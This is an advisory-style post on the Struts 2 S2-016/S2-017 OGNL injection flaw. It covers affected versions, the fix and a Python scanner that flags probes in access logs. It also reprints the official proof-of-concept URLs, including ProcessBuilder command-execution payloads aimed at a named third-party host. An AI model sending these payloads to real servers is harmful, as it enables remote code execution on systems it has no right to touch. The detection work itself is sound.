Source: http://zone.wooyun.org/content/5159
PoC taken from the official advisories:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html
This is a code execution vulnerability: the injected OGNL expression runs Java code on the server, which can in turn execute system commands.
Affected versions: Struts 2.0.0 – Struts 2.3.15
Vulnerability description:
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
Test PoC:
In the Struts Blank App, open following URLs.
Simple Expression – the parameter names are evaluated as OGNL.
http://www.8090sec.com/struts2-blank/example/X.action?action:%25{3*4}
http://www.8090sec.com/struts2-showcase/employee/save.action?redirect:%25{3*4}
Command Execution
http://www.8090sec.com/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://www.8090sec.com/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://www.8090sec.com/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Fix:
DefaultActionMapper was changed to sanitize “action:”-prefixed information properly. The features involved with “redirect:”/”redirectAction:”-prefixed parameters were completely dropped – see also S2-017.
Official advisory: http://struts.apache.org/release/2.3.x/docs/s2-016.html
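Because the OGNL sits in the parameter name rather than the value, a quick way to check web server logs for S2-016/S2-017 probes is to percent-decode each query parameter name once (as the container does, so the %25{ of the PoCs becomes %{) and look for the three navigation prefixes combined with an expression marker. The following log scanner is an added example, not code from the Struts project or the original post; the access log entries are constructed, and treating ${ as an OGNL marker alongside %{ is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter-name prefixes that DefaultActionMapper (before 2.3.15.1) treats as
# navigation targets and evaluates as OGNL (S2-016 / S2-017).
PREFIXES = ("action:", "redirect:", "redirectAction:")
# Expression openers that have no business in a navigation target
# (${ included as an assumption, %{ is what the official PoCs use).
OGNL_MARKER = re.compile(r"[%$]\{")
# Request line inside a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return (decoded_param_name, kind) for each prefixed parameter name in a
    request target; kind is 'ognl' if an expression marker is present, else
    'prefix' (plain redirect:/redirectAction: targets, the S2-017 case)."""
    query = urlsplit(target).query
    findings = []
    # parse_qsl percent-decodes once and keeps value-less names such as
    # "action:%25{3*4}" only when keep_blank_values is set.
    for name, _value in parse_qsl(query, keep_blank_values=True):
        if name.startswith(PREFIXES):
            kind = "ognl" if OGNL_MARKER.search(name) else "prefix"
            findings.append((name, kind))
    return findings


def scan_log(lines):
    """Return (client_ip, decoded_param_name, kind) for every hit in the log."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, kind in suspicious_params(m.group("target")):
            hits.append((client_ip, name, kind))
    return hits


# Constructed sample access log: one OGNL probe, one plain redirect, one benign request.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2013:10:00:01 +0000] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 302 0',
    '192.0.2.11 - - [17/Jul/2013:10:00:02 +0000] "GET /struts2-showcase/employee/save.action?redirect:/index.action HTTP/1.1" 302 0',
    '192.0.2.12 - - [17/Jul/2013:10:00:03 +0000] "GET /struts2-blank/example/HelloWorld.action?name=world HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client_ip, name, kind in scan_log(SAMPLE_LOG):
        print(f"{kind:6} {client_ip:12} {name}")
```

A 'prefix' hit on a server still running a version before 2.3.15.1 is worth a look too, since the whole redirect:/redirectAction: feature was removed in the fix and legitimate traffic should stop using it after upgrading.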